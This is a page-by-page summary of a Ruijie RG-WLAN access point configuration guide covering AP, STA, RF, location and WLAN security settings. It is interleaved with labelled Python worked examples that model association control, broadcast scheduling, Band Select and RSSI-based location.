Ruijie RG-WLAN Series Rgos Configuration Manual
RG-WLAN Series Access Point
RGOS Configuration Guide, Release 11.1(5)B8

Summary of Contents for Ruijie RG-WLAN Series

  • Page 1 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8...
  • Page 2 This document is provided “as is”. The contents of this document are subject to change without any notice. Please obtain the latest information through the Ruijie Networks website. Ruijie Networks endeavors to ensure content accuracy and will not shoulder any responsibility for losses and damages caused due to content omissions, inaccuracies or errors.
  • Page 3 This manual is intended for: network engineers; technical support and servicing engineers; network administrators. Obtaining Technical Assistance: Ruijie Networks website: http://www.ruijienetworks.com/ ; Ruijie service portal: http://case.ruijienetworks.com . Related Documents: Command Reference - describes the related configuration commands, including command modes, parameter descriptions, usage guides, and related examples.
  • Page 4 Symbols: Note: means reader take note; notes contain helpful suggestions or references. Caution: means reader be careful; in this situation, you might do something that could result in equipment damage or loss of data.
  • Page 5 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 WLAN Basic Configuration 1. Configuring AP Management 2. Configuring STA Management 3. Configuring Ethernet Management 4. Configuring Data Plane 5. Configuring WLAN Log...
  • Page 6 Configuration Guide Configuring AP Management 1 Configuring AP Management 1.1 Overview 1.2 Application 1.3 Features Basic Concepts: An AP is an access point used by wireless terminals to access a wired network. It is equivalent to a bridge for communication between wireless terminals and a wired network.
  • Page 7 After the AP mode is switched between the fit and fat AP modes, the AP must be restarted to ensure configuration consistency. For WALL-APs supplied by Ruijie Networks, when the fat AP mode is used, the default IP address of rear...
  • Page 8 Configuration Guide Configuring AP Management Steps: Run the ap-mode command. Ruijie(config)#ap-mode fit Verification: On the AP, run the show ap-mode command to check the current mode of the AP. Ruijie#show ap-mode current mode: fit Common Errors: None 1.5 Monitoring...
  • Page 9 Configuration Guide Configuring STA Management 2 Configuring STA Management 2.1 Overview STA Management (STAMG) implements station (STA) management, including STA access control management and STA event notification. Event notification is mainly used to serve other function modules. Applications of the STAMG functions are as follows: ...
  • Page 10 Configuration Guide Configuring STA Management signals travel in the space. When E-bags are used in two adjacent classrooms at the same time, the ideal condition is that all the teacher and student terminals are associated with the AP of their own classrooms so that the two classrooms will not interfere with each other.
  • Page 11 Configuration Guide Configuring STA Management Notes: When a package is deleted, all its related configurations are deleted as well. If some STAs in this package are currently associated, all these STAs will be deassociated. A package can be configured with only one primary STA. If the primary STA of a package is configured multiple times, the latest configuration prevails.
  • Page 12 Configuration Guide Configuring STA Management Command: secondary-sta mac-address. Parameter Description: mac-address indicates the MAC address of the STA. Defaults: No secondary STA is configured by default. Command Mode: Package configuration mode. Usage Guide. Configuring an Association Control Zone ...
  • Page 13 Configuration Guide Configuring STA Management Enable the association control function. Command: assoc-control. Defaults: The association control function is disabled by default. Command Mode: Global configuration mode. Usage Guide. Verification: Verify that secondary STAs can be associated with APs in the same group as the primary STA. Configuration Example ...
  • Page 14 Configuration Guide Configuring STA Management AP1(config-czone)# exit AP1(config)#assoc-control AP3#configure terminal Enter configuration commands, one per line. End with CNTL/Z. AP3(config)# package Cart 1 AP3(config-package)#primary-sta 00d0.f800.0001 AP3(config-package)#secondary-sta 00d0.f800.0002 AP3(config-package)#secondary-sta 00d0.f800.0003 AP3(config-package)# exit AP3(config)# control-zone Classroom 2 AP3(config-czone)# ap AP3 AP3(config-czone)# exit AP3(config)#assoc-control ...
  • Page 15 Configuration Guide Configuring STA Management Association control is enabled. AP3# show package ========= Cart 1 ========= primary STA : 00d0.f800.0001 secondary STA num : 2 00d0.f800.0002 00d0.f800.0003 AP3# show assoc-control control zone num : 1 control-zone AP ------------- ------------------------ Classroom 1 AP3 00d0.f800.889f Common Errors ...
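Added worked example (not from the Ruijie manual): a small Python model of the association-control decision that pages 11 to 15 describe. A package bundles one primary STA with its secondary STAs, a control zone groups APs, and while assoc-control is enabled a secondary STA is admitted only by an AP in the same control zone as the AP its primary STA is on. Class and method names are this example's own, and the treatment of a secondary STA whose primary is not online (refuse) is an assumption the manual does not state.

```python
"""Association-control decision model (constructed example, not RGOS code)."""
from dataclasses import dataclass, field


@dataclass
class Package:
    name: str
    primary: str                  # MAC of the primary STA (the teacher's terminal)
    secondaries: set = field(default_factory=set)


class AssocController:
    def __init__(self, enabled=True):
        self.enabled = enabled            # mirrors the global 'assoc-control' command
        self.packages = {}                # package name -> Package
        self.zone_of_ap = {}              # AP name -> control zone name
        self.ap_of_sta = {}               # STA MAC -> AP it is currently associated with

    # --- configuration (package / primary-sta / secondary-sta / control-zone / ap) ---
    def add_package(self, name, primary, secondaries):
        # A package has exactly one primary STA; reconfiguring overwrites (latest prevails).
        self.packages[name] = Package(name, primary, set(secondaries))

    def delete_package(self, name):
        # Deleting a package deassociates every STA that belonged to it.
        pkg = self.packages.pop(name)
        for mac in {pkg.primary, *pkg.secondaries}:
            self.ap_of_sta.pop(mac, None)

    def add_ap_to_zone(self, zone, ap):
        self.zone_of_ap[ap] = zone

    # --- runtime ---
    def package_of(self, mac):
        return next((p for p in self.packages.values()
                     if mac == p.primary or mac in p.secondaries), None)

    def may_associate(self, mac, ap):
        if not self.enabled:
            return True
        pkg = self.package_of(mac)
        if pkg is None or mac == pkg.primary:
            return True                    # unmanaged STAs and primaries are never restricted
        primary_ap = self.ap_of_sta.get(pkg.primary)
        if primary_ap is None:
            return False                   # assumption: primary offline -> secondaries wait
        zone = self.zone_of_ap.get(primary_ap)
        return zone is not None and zone == self.zone_of_ap.get(ap)

    def associate(self, mac, ap):
        """Admit or refuse an association request; returns True if admitted."""
        ok = self.may_associate(mac, ap)
        if ok:
            self.ap_of_sta[mac] = ap
        return ok


def classroom_demo():
    """Replays the two-classroom scenario from page 14 and returns the decisions."""
    ctl = AssocController()
    ctl.add_ap_to_zone("Classroom 1", "AP1")
    ctl.add_ap_to_zone("Classroom 2", "AP3")
    ctl.add_package("Cart 1", "00d0.f800.0001", ["00d0.f800.0002", "00d0.f800.0003"])
    return {
        "primary->AP3":   ctl.associate("00d0.f800.0001", "AP3"),
        "secondary->AP3": ctl.associate("00d0.f800.0002", "AP3"),  # same zone as the primary
        "secondary->AP1": ctl.associate("00d0.f800.0003", "AP1"),  # other classroom: refused
        "visitor->AP1":   ctl.associate("00d0.f800.ffff", "AP1"),  # not in any package
    }
```

The model also shows why the manual's deletion note matters: removing a package drops every member's association state, so a stale package cannot keep steering terminals after the cart has been reassigned.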
  • Page 16 Configuration Guide Configuring Ethernet Management 3 Configuring Ethernet Management 3.1 Overview Ethernet Management (ETH-MNG) is an AP wired parameter management service used to configure wired parameters of APs. The LAN port bandwidth restriction function, as a fundamental service of ETH-MNG, is used to configure the maximum bandwidth of various LAN ports of APs, so as to avoid the slow Internet access of wireless users in a scenario where wireless and wired users coexist and wired users occupy a substantial bandwidth.
  • Page 17 Configuration Guide Configuring Ethernet Management 3.3.2 LAN port Bandwidth Restriction 3.3.2.1 Working Principle The LAN port bandwidth restriction function is used to configure the maximum bandwidth of various LAN ports of APs so as to avoid the slow Internet access of wireless users caused in a scenario where wireless and wired users coexist and wired users occupy a substantial bandwidth.
  • Page 18 Configuration Guide Configuring Ethernet Management Run the wired-rate command to configure the maximum bandwidth of the LAN ports. Command: wired-rate value. Defaults: By default, the maximum bandwidths of the LAN ports are not limited. Command Mode: Interface configuration mode. Usage Guide. 3.4.1.4 Verification ...
  • Page 19 Configuration Guide Configuring Data Plane 4 Configuring Data Plane 4.1 Overview The data plane provides broadcast forwarding control functions, including broadcast forwarding weight control and broadcast wireless forwarding control. Broadcast forwarding weight control means restricting the weights of packet types for broadcast forwarding, so as to prevent STAs from being affected when a certain type of packet occupies all resources.
  • Page 20 Configuration Guide Configuring Data Plane 4.3.2 Overview Feature Description: Broadcast Forwarding Weight Control restricts the weights of packet types for broadcast forwarding, so as to protect RF resources from being occupied by a certain type of packet and thereby guarantee normal forwarding of other packets.
  • Page 21 Configuration Guide Configuring Data Plane 4.4 Configuration Configuration Description and Command: Broadcast Forwarding Weight Control (Optional configuration): Set the weights of packet types for broadcast forwarding. data-plane queue-weight configures the weights of packet types for broadcast forwarding on the AP. Broadcast Wireless (Optional configuration).
  • Page 22 Configuration Guide Configuring Data Plane Command: data-plane queue-weight unicast-packet-weight multicast-packet-weight broadcast-packet-weight unknown-multicast-packet-weight unknown-unicast-packet-weight. Parameter Description: unicast-packet-weight sets the forwarding weight of unicast packets; the range is from 1 to 100. multicast-packet-weight sets the forwarding weight of multicast packets; the range is from 1 to 50. broadcast-packet-weight sets the forwarding weight of broadcast packets.
  • Page 23 Configuration Guide Configuring Data Plane 4.4.2.4 Verification: Run the show run command to display configuration information. 4.5 Monitoring ...
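Added worked example (not from the Ruijie manual): a Python weighted round-robin scheduler that shows what the data-plane queue-weight parameters on page 22 buy you. Each of the five packet classes gets its own queue and at most `weight` dequeues per round, so a broadcast storm cannot starve unicast and multicast traffic. The weights, the `known` flag (standing in for "destination present in the forwarding table") and the constructed traffic are this example's assumptions; the manual only gives the parameter ranges.

```python
"""Weighted forwarding scheduler modelling 'data-plane queue-weight' (constructed example)."""
from collections import deque

CLASSES = ("unicast", "multicast", "broadcast", "unknown-multicast", "unknown-unicast")


def classify(frame):
    """Map a constructed frame record {'dst': mac, 'known': bool} to its forwarding class."""
    dst = frame["dst"].lower()
    if dst == "ff:ff:ff:ff:ff:ff":
        return "broadcast"
    is_group = int(dst.split(":")[0], 16) & 1 == 1           # I/G bit of the first octet
    if is_group:
        return "multicast" if frame.get("known", False) else "unknown-multicast"
    return "unicast" if frame.get("known", False) else "unknown-unicast"


def schedule(frames, weights, budget):
    """Forward up to 'budget' frames by weighted round robin over the class queues.
    One round visits every class and takes at most weights[class] frames from it."""
    queues = {c: deque() for c in CLASSES}
    for f in frames:
        queues[classify(f)].append(f)
    out = []
    while len(out) < budget and any(queues.values()):
        for c in CLASSES:
            for _ in range(weights[c]):
                if not queues[c] or len(out) >= budget:
                    break
                out.append(queues[c].popleft())
    return out


def forwarded_counts(frames, weights, budget):
    """Per-class count of what the weighted scheduler forwards within the budget."""
    out = schedule(frames, weights, budget)
    return {c: sum(1 for f in out if classify(f) == c) for c in CLASSES}


def fifo_counts(frames, budget):
    """Same budget, plain FIFO: the contrast case the weights are there to prevent."""
    out = frames[:budget]
    return {c: sum(1 for f in out if classify(f) == c) for c in CLASSES}


# Constructed traffic: a 1000-frame broadcast storm arriving ahead of a little legitimate traffic.
storm = [{"dst": "ff:ff:ff:ff:ff:ff", "known": True} for _ in range(1000)]
legit = ([{"dst": "00:d0:f8:00:00:01", "known": True} for _ in range(20)]     # unicast
         + [{"dst": "01:00:5e:00:00:fb", "known": True} for _ in range(10)]   # known multicast
         + [{"dst": "00:d0:f8:00:00:02", "known": False} for _ in range(5)])  # unknown unicast

# Weights chosen inside the manual's ranges (unicast 1-100, multicast 1-50); broadcast kept low.
WEIGHTS = {"unicast": 10, "multicast": 5, "broadcast": 2,
           "unknown-multicast": 1, "unknown-unicast": 1}
```

With a budget of 100 transmit slots the weighted scheduler forwards all 35 legitimate frames and 65 broadcast frames; the FIFO forwarder spends all 100 slots on the storm.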
  • Page 24 Configuration Guide Configuring WLAN Log 5 Configuring WLAN Log 5.1 Overview WLOG (WLAN Log) enables storing and viewing wireless network and STA status in a past period of time. By collecting and storing the information of STA in the past 24 hours and then displaying the information through CLI commands, WLOG allows users to analyze the wireless network status and troubleshoot problems.
  • Page 25 Configuration Guide Configuring WLAN Log Number of associated online STAs Number of online STAs which have passed Web authentication Number of online STAs which have passed 802.1x authentication Intensity of the co-channel interference signal Number of received error frames Packet retransmission times ...
  • Page 26 Configuration Guide Configuring WLAN Log Feature Description Enabling the WLOG You can enable the WLOG feature to automatically collect AP and STA information. Feature 5.3.1 Enabling the WLOG Feature After the WLOG feature is enabled, the AP automatically collects AP and STA information and records the information into memory, enabling users, with provided information, to have a more accurate understanding of the wireless network and STA status in the past 24 hours and analyze and troubleshoot problems.
  • Page 27 Configuration Guide Configuring WLAN Log Command Mode. Usage Guide. Verification: Run the show wlan diag sta command to check whether the STA information can be viewed on the AP. Common Errors. 5.5 Monitoring: Displays the STA information on the AP: show wlan diag sta [ sta-mac sta-mac ] [ number number ]...
  • Page 28 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 WLAN RF Configuration 1 Configuring RF Scheduling 2 Configuring Band Select 3 Configuring Smartant 4 Configuring FSS 5 Configuring Wireless Location...
  • Page 29 Configuration Guide Configuring RF Scheduling 1 Configuring RF Scheduling 1.1 Overview The radio frequency (RF) resources mentioned in this document include the RF of an Access Point (AP) as well as a wireless local area network (WLAN) services. RF scheduling can perform automatic management on the RF resources. RF scheduling can be used to disable the RF of an AP or a WLAN in the specified time interval, realizing the following functions: ...
  • Page 30 Configuration Guide Configuring RF Scheduling Working Principle Before using the scheduling function, a scheduling session needs to be created first to specify the time for RF scheduling. Then the scheduling session can be applied to an AP RF interface or WLAN. ...
  • Page 31 Configuration Guide Configuring RF Scheduling When the scheduling session starts or ends, the system sends a scheduling message. In the handling of the scheduling message, the processing logic will locate the WLAN where this scheduling session is applied to, and enable or disable the WLAN.
  • Page 32 Configuration Guide Configuring RF Scheduling Configuration Steps: Creating a Scheduling Session (Mandatory): Run the schedule session sid command to create a scheduling session. sid indicates the Session ID, which can be set to a value ranging from 1 to 8 on a fat AP. ...
  • Page 33 Configuration Guide Configuring RF Scheduling Command: schedule session sid. Parameter Description: sid indicates the Session ID; it can be set to a value ranging from 1 to 8 on a fat AP. Defaults: No scheduling session is applied. Command Mode: WLAN configuration mode or interface configuration mode. Usage Guide. Verification...
  • Page 34 Configuration Guide Configuring RF Scheduling Specifying the Time Interval for a Scheduling Session (Mandatory). Command: schedule session sid time-range n period day1 [ to day2 ] time hh1:mm1 to hh2:mm2. Parameter Description: session sid indicates the Session ID; it can be set to a value ranging from 1 to 8 on a fat AP. time-range n indicates the number of a time interval, which ranges from 1 to 8.
  • Page 35 Configuration Guide Configuring Band Select 2 Configuring Band Select 2.1 Overview Band Select is a technology for optimizing access band distribution for STAs on a WLAN. The Band Select function leads dual-band STAs to access the higher-capacity 5 GHz band to reduce the pressure on the 2.4 GHz band and improve user experience.
  • Page 36 Configuration Guide Configuring Band Select Active scanning: The STA broadcasts a Probe Request frame on all channels of all supported bands. After receiving the Probe Request frame, the APs providing WLAN access service send a Probe Response frame including some WLAN information to the STA.
  • Page 37 Configuration Guide Configuring Band Select If the AP can receive the Probe Request frame from an STA on both the 2.4 GHz band and the 5 GHz band, this STA is a dual-band STA. If the AP can receive the Probe Request frame from this STA only on the 5 GHz band, the AP learns that this STA is a 5 GHz STA.
  • Page 38 Configuration Guide Configuring Band Select Active Scanning Before the Band Select Function Identifies STA Types: If the Band Select function is enabled for a WLAN, the WLAN may respond differently to active scanning by an STA. Before STA types are identified: ...
  • Page 39 Configuration Guide Configuring Band Select whether the STA sends two frames within the same scanning cycle or sends the two frames in two consecutive scanning cycles. If the AP sets the minimum scanning cycle of the STA to 200 milliseconds, the two frames are considered to be sent within the same scanning cycle because their interval is shorter than 200 milliseconds.
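Added worked example (not from the Ruijie manual): a Python state machine for the Band Select behaviour on pages 36 to 42. It classifies STAs from the bands their Probe Requests arrive on, answers 5 GHz probes unconditionally, suppresses 2.4 GHz Probe Responses for dual-band STAs, leaves STAs below the minimum RSSI alone, treats probes less than the 200 ms scanning cycle apart as one cycle, and ages out dual-band and suppression records with the two age-out timers. The handling of a STA whose type is not yet known (hold back 2.4 GHz responses for `probe_cycles` scanning cycles, then treat it as 2.4 GHz-only) and all names are this example's assumptions.

```python
class BandSelect:
    """Per-WLAN Band Select state (constructed example, not RGOS code). Times are integer ms."""

    def __init__(self, cycle_ms=200, dual_age_ms=60_000, suppress_age_ms=20_000,
                 min_rssi=-80, probe_cycles=2):
        self.cycle_ms = cycle_ms                 # minimum scanning cycle of a STA (page 39: 200 ms)
        self.dual_age_ms = dual_age_ms           # band-select age-out dual-band (20-120 s)
        self.suppress_age_ms = suppress_age_ms   # band-select age-out suppression (10-60 s)
        self.min_rssi = min_rssi                 # STAs weaker than this are not steered
        self.probe_cycles = probe_cycles         # assumption: cycles to hold back an unknown STA
        self.seen = {"2.4GHz": {}, "5GHz": {}}   # band -> {mac: time of last Probe Request}
        self.supp = {}                           # mac -> [cycles held, last 2.4 GHz probe, expiry]

    def _expire(self, t):
        for band in self.seen:
            self.seen[band] = {m: ts for m, ts in self.seen[band].items()
                               if t - ts < self.dual_age_ms}
        self.supp = {m: r for m, r in self.supp.items() if r[2] > t}

    def classify(self, mac, t):
        """'dual-band', '5GHz', '2.4GHz' or 'unknown'. A 2.4 GHz-only verdict needs one full
        scanning cycle without a 5 GHz probe (assumption)."""
        self._expire(t)
        bands = {b for b, tbl in self.seen.items() if mac in tbl}
        if bands == {"2.4GHz", "5GHz"}:
            return "dual-band"
        if bands == {"5GHz"}:
            return "5GHz"
        if bands == {"2.4GHz"} and t - self.seen["2.4GHz"][mac] >= self.cycle_ms:
            return "2.4GHz"
        return "unknown"

    def on_probe_request(self, mac, band, rssi, t):
        """Return True if the AP should answer this Probe Request with a Probe Response."""
        self._expire(t)
        self.seen[band][mac] = t
        if band == "5GHz":
            return True                          # always answer on the band we steer towards
        if rssi < self.min_rssi:
            return True                          # below the Band Select minimum RSSI: never steer edge STAs
        if mac in self.seen["5GHz"]:
            self.supp[mac] = [self.probe_cycles, t, t + self.suppress_age_ms]
            return False                         # known dual-band STA: suppress the 2.4 GHz response
        rec = self.supp.get(mac)
        if rec is None:
            self.supp[mac] = [1, t, t + self.suppress_age_ms]
            return False                         # first 2.4 GHz cycle: hold back, give 5 GHz a chance
        if t - rec[1] >= self.cycle_ms:
            rec[0] += 1                          # >= cycle_ms after the last probe: a new scanning cycle
        rec[1], rec[2] = t, t + self.suppress_age_ms
        return rec[0] > self.probe_cycles        # held for probe_cycles cycles: treat as 2.4 GHz-only
```

Because Band Select only withholds Probe Responses, a STA that ignores the hint and sends an Association Request on 2.4 GHz is still served; this matches the manual's note that the function plays only a "leading" role and yields to other functions.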
  • Page 40 Configuration Guide Configuring Band Select function plays only the "leading" role during STA access and has a low priority. When the Band Select function conflicts with other functions, the other functions shall prevail. 2.4 Configuration The band select function is not supported on the following AP products: AP110-W, AP220-I v1.x, AP220-SI v1.x, AP220-E v2.x, AP220-SH v2.0, AP220-SH (C) v3.0, AP220-E(M) v2.x, AP620-H(C) v2.x, AP220-E(C) v3.0, AP220-SH(C) v2.99, AP220-E(C) v2.99.
  • Page 41 Configuration Guide Configuring Band Select Defaults: The Band Select function is disabled. Command Mode: WLAN configuration mode. Usage Guide. Configuring the Minimum RSSI for the Band Select Function (Optional): It is configured when you want to adjust the coverage of the Band Select function. ...
  • Page 42 Configuration Guide Configuring Band Select Command: band-select age-out { dual-band value | suppression value }. Parameter Description: dual-band value specifies the aging time of dual-band STA information, ranging from 20 to 120 seconds. suppression value specifies the aging time of suppression STA information, ranging from 10 to 60 seconds.
  • Page 43 Configuration Guide Configuring Band Select Verification: Run the show band-select configuration command to display parameters of the Band Select function. Run the show running-config command to check whether the Band Select function is enabled. After a period of running, run the show band-select statistics command to check the statistics on the AC. ...
  • Page 44 Configuration Guide Configuring Smartant 3 Configuring Smartant 3.1 Overview Smartant means smart antenna, also known as auto-sensing antenna array. It is composed of three parts: antenna array, beam forming network, and beam forming algorithm. By adopting algorithms meeting certain criteria, Smartant adjusts the weighted amplitude and phase of each array signal and thereby adjusts the radiation pattern of the antenna array to enhance required signals and suppress interference signals.
  • Page 45 Configuration Guide Configuring Smartant Through downlink packet training and sampling by the AP, an optimal transmission path is found to avoid interference and obstacles. 3.4 Configuration Configuration Description and Command: Enabling the Smartant function (Optional): It is used to configure the Smartant function. smartant enable radio configures Smartant.
  • Page 46 Configuration Guide Configuring Smartant 3.5 Monitoring Displaying Description Command Displays AP configuration. show running...
  • Page 47 Analysis 4.2.1 Networking with the SNC Software to Achieve Frequency Spectrum Analysis Scenario: Ruijie's SNC software achieves frequency spectrum analysis. The SNC software is networked with Ruijie's wireless AP system, as shown in Figure 4-1: There are non-802.11 wireless interference devices such as microwave ovens and cordless phones in the RF environment.
  • Page 48 Configuration Guide Configuring FSS Deployment: Enable frequency spectrum analysis on the AP. Establish a connection between the SNC software and the AP. 4.3 Features Basic Concepts: Video Bridge Interference: During operation, a video bridge may generate wireless signals that interfere with WLAN transmission. The FSS of an AP can recognize video bridge interference and send it to the SNC software for analysis.
  • Page 49 Fourier Transform (FFT). Then the AP classifies the information for processing, recognizes and sends specific interference sources to the SNC software via the agreed protocol. After receiving information, the SNC software sorts out and displays the interference information in various ways. For specific operations, refer to Ruijie's user manual for the SNC software.
  • Page 50 Ruijie(config)# spectral enable Ruijie(config)# end Verification: Run the show running-config command to verify that FSS is enabled on the target AP. Ruijie# show running-config spectral enable Common Errors: This command is used in the all AP configuration mode.
  • Page 51 Configure the frequency spectrum scanning precision for video bridges as 2. Configuration Steps: Ruijie# configure terminal Ruijie(config)# spectral enable Ruijie(config)# spectral stability vbr 2 Ruijie(config)# end Verification: Run the show running-config command to verify the frequency spectrum scanning precision on the target AP.
  • Page 53 Configure the frequency spectrum scanning duration as 10 μs. Configuration Steps: Ruijie# configure terminal Ruijie(config)# spectral enable Ruijie(config)# spectral period 10 Ruijie(config)# end Verification: Run the show running-config command to verify the scanning duration configured on the target AP. Ruijie# show running-config spectral enable...
  • Page 54 MUs: 802.11-compliant wireless STAs regularly transmitting wireless signals. Receiver: The Receiver can be a Ruijie AP or an AeroScout Tag exciter (used not to collect locations but to excite the TAGs to transmit specified wireless signals). Backend Location System: The Backend Location System includes a Locator, AeroScout Engine (AE) computing software and all kinds of graphic programs.
  • Page 55 Configuration Guide Configuring Wireless Location Feature Description Enables WL for APs. 5.3.1 WL Working Principle Based on the measurement of RSSI from an MU received by a base station (BS) and the channel transmission model, the distance between them can be estimated to be d. In this way, for a BS (i), the MU must be on the circle centered at BS (i) with a radius of d.
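Added worked example (not from the Ruijie manual): the RSSI-to-distance step and the circle intersection that page 55 describes, carried through in Python. Each base station converts the RSSI it measures from the MU into a distance d with a channel model, which puts the MU on a circle of radius d around that station; subtracting one circle equation from the others turns the intersection into a linear least-squares problem that three or more non-collinear stations solve. The log-distance path-loss model and its calibration values (P0 at 1 m, exponent n), the station layout and the measurements are constructed assumptions; the manual does not specify the channel model.

```python
"""RSSI-based wireless location: path-loss inversion plus least-squares trilateration (constructed example)."""
import math

P0_DBM = -40.0    # assumed RSSI at the reference distance d0 = 1 m
PATHLOSS_N = 3.0  # assumed indoor path-loss exponent


def distance_from_rssi(rssi_dbm, p0_dbm=P0_DBM, n=PATHLOSS_N, d0=1.0):
    """Invert the log-distance model RSSI = P0 - 10 n log10(d / d0) to get the BS-to-MU distance d."""
    return d0 * 10 ** ((p0_dbm - rssi_dbm) / (10 * n))


def rssi_from_distance(d, p0_dbm=P0_DBM, n=PATHLOSS_N, d0=1.0):
    """Forward model; used here only to build constructed measurements."""
    return p0_dbm - 10 * n * math.log10(d / d0)


def trilaterate(circles):
    """circles: [(x_i, y_i, d_i), ...] for at least three non-collinear base stations.
    Subtracting circle 1 from circle i linearises (x-x_i)^2 + (y-y_i)^2 = d_i^2 into
        2(x_i-x_1) x + 2(y_i-y_1) y = d_1^2 - d_i^2 + x_i^2 - x_1^2 + y_i^2 - y_1^2,
    which is solved in the least-squares sense through the 2x2 normal equations."""
    if len(circles) < 3:
        raise ValueError("need at least three base stations")
    x1, y1, d1 = circles[0]
    a11 = a12 = a22 = b1 = b2 = 0.0
    for xi, yi, di in circles[1:]:
        ax, ay = 2 * (xi - x1), 2 * (yi - y1)
        rhs = d1 ** 2 - di ** 2 + xi ** 2 - x1 ** 2 + yi ** 2 - y1 ** 2
        a11 += ax * ax
        a12 += ax * ay
        a22 += ay * ay
        b1 += ax * rhs
        b2 += ay * rhs
    det = a11 * a22 - a12 * a12
    if abs(det) < 1e-9:
        raise ValueError("base stations are collinear; the position is ambiguous")
    return ((a22 * b1 - a12 * b2) / det, (a11 * b2 - a12 * b1) / det)


def locate(readings):
    """readings: [(bs_x, bs_y, rssi_dbm), ...] as the APs would report them to the Locator."""
    return trilaterate([(x, y, distance_from_rssi(r)) for x, y, r in readings])


def constructed_readings(mu=(3.0, 4.0), bs=((0, 0), (10, 0), (0, 10), (10, 10)), noise_db=0.0):
    """Constructed measurements for an MU at a known position; alternating +/- noise keeps it reproducible."""
    out = []
    for i, (x, y) in enumerate(bs):
        d = math.hypot(mu[0] - x, mu[1] - y)
        out.append((x, y, rssi_from_distance(d) + (noise_db if i % 2 else -noise_db)))
    return out
```

With exact RSSI values the solver returns the true position (3, 4); with 2 dB of measurement error the estimate drifts by about 1.5 m, which is why the manual's send interval and aggregation settings matter: the Locator averages many such reports.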
  • Page 56 Configuration Guide Configuring Wireless Location Configuration Description and Command (Optional) It is used to optimize the WL transmission. wlocation compound enable enables WL aggregation. wlocation send-mu-time configures the interval for sending MU location information on a specified AP. wlocation send-tag-time configures the interval for sending TAG location information on a specified AP.
  • Page 57 Configuration Guide Configuring Wireless Location The commands for configuring the IP address and port are wlocation ae-ip ip-address and wlocation ae-port port respectively. Command: wlocation ae-ip ip-address. Parameter Description: ip-address is the IP address of the Locator. Defaults: No IP address is configured for the Locator; the AE server's default IP address is 0.0.0.0. Command Mode: Wlocation configuration mode...
  • Page 58 Configuration Guide Configuring Wireless Location In scenarios with many STAs to be located, reduce the interval to avoid information loss (an AP can cache 500 to 700 pieces of location information). Command: wlocation send-mu-time interval. Parameter Description: interval is the time interval, ranging from 100 to 5,000 ms. Defaults: The default interval is 300 ms.
  • Page 59 Use this command where there is a requirement for lower traffic bandwidth and the deployed location system interconnects with the location server developed by Ruijie Networks. Except as otherwise noted, you can apply the configuration on demand. Command...
  • Page 60 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 WLAN Security Configuration 1. Configuring RSNA 2. Configuring WIDS 3. Configuring CPU Protection 4. Configuring NFPP 5. Configuring WAPI...
  • Page 61 Configuration Guide Configuring RSNA 1 Configuring RSNA 1.1 Overview The Robust Security Network Architecture (RSNA) function provides security mechanisms for WLANs. A WLAN uses open media and public electromagnetic waves as a carrier to transmit data signals. Neither communication party is connected with a cable. If transmission links are not properly protected through encryption, data transmission will be at great risk.
  • Page 62 Configuration Guide Configuring RSNA 1.2.1 WEP Encryption Scenario: In a small WLAN that has a lower requirement for security, WEP encryption can be used. WEP encryption can use the open-system or shared-key link authentication mode. Their differences are as follows: ...
  • Page 63 Configuration Guide Configuring RSNA Deployment: Configure a WLAN on AP1 and AP2. Configure PSK authentication in WLAN security configuration mode on the AP devices. Use this authentication together with WEB authentication to support web-based authentication and charging. 1.2.3 802.1X Access Authentication Scenario: In a scenario that has a higher requirement for security, 802.1X authentication can be used.
  • Page 64 Configuration Guide Configuring RSNA Figure 1-3 L2/L3 Network Authentication Server AC (802.1X L2/L3 Network Authentication) Deployment: Configure a WLAN on AP1 and AP2. Configure an authentication server on AP1 and AP2. Configure 802.1X authentication in WLAN security configuration mode on the AP devices. 1.3 Features Basic Concepts ...
  • Page 65 Configuration Guide Configuring RSNA CCMP: Counter Mode with CBC-MAC Protocol (CCMP) uses AES, which is safer than TKIP. Authentication and Key Management (AKM) is an access authentication mode for users to access a WLAN. Overview: Link Verification verifies the security of a wireless link before an STA associates with a WLAN. Access Authentication performs authentication for an STA that accesses a WLAN.
  • Page 66 Configuration Guide Configuring RSNA Shared-key Link Authentication: Shared-key link authentication is another authentication mechanism in addition to open-system link authentication. It requires that the same shared key be configured on the STA and the AP. Shared-key link authentication can be configured only with static WEP encryption, whereas open-system link authentication is available in all the other modes.
  • Page 67 Configuration Guide Configuring RSNA Pre-shared Key (PSK) is an 802.11i authentication mode, which performs authentication with pre-defined static keys. This authentication approach requires that an STA and an AP be configured with the same pre-shared key. If their keys are the same, the PSK access authentication succeeds;...
  • Page 68 Configuration Guide Configuring RSNA WEP uses the RC4 algorithm to protect data privacy and implements authentication by using a shared key. WEP does not specify a key management scheme. Generally, keys are configured and maintained manually. WEP that does not provide a key distribution mechanism is called manual WEP or static WEP. Note that WEP is a deprecated protocol: its short IVs lead to RC4 keystream reuse and its CRC-32 integrity check is forgeable, so a static WEP key can be recovered from captured traffic. Prefer RSN (WPA2) with AES/CCMP wherever the STAs support it.
  • Page 69 Configuration Guide Configuring RSNA Configuration Description and Command: security static-wep-key authentication configures the link authentication mode of static WEP. (Mandatory) It is used to enable WPA authentication. security wpa configures WPA authentication. security wpa ciphers configures the encryption mode of WPA authentication.
  • Page 70 Configuration Guide Configuring RSNA Configuration Description and Command: authtimeout pairtime configures the timeout duration of unicast key negotiation packets. webauth prevent-jitter configures the jitter prevention time of WEB authentication. 1.4.1 Configuring Static WEP Configuration Effect: Enable static WEP encryption and provide WEP encryption protection for WLAN data. ...
  • Page 71 Steps: Access the security configuration mode of WLAN 1. Enable static WEP encryption and configure a WEP key. Set the link authentication mode to shared-key link authentication. Ruijie(config)#wlansec 1 Ruijie(config-wlansec)#security static-wep-key encryption 40 ascii 1 12345 Ruijie(config-wlansec)#security static-wep-key authentication share-key...
  • Page 72 Configuring RSNA Verification: Run the show running-config | begin wlansec wlan_id command to check whether the configuration takes effect. Ruijie#show running-config | begin wlansec 1 wlansec 1 security static-wep-key encryption 40 ascii 1 12345 security static-wep-key authentication share-key Common Errors ...
  • Page 73 Configuration Guide Configuring RSNA When WPA authentication is used, the encryption mode and the access authentication mode must both be configured. If only one of them is configured, or neither, STAs cannot access the WLAN. ...
  • Page 74 Configuration Guide Configuring RSNA Only one access authentication mode can be enabled for a WLAN in security configuration mode. Configuring a Shared Key for WPA Authentication (Optional): It must be configured when WPA PSK authentication is enabled. It is configured in WLAN security configuration mode on the AP.
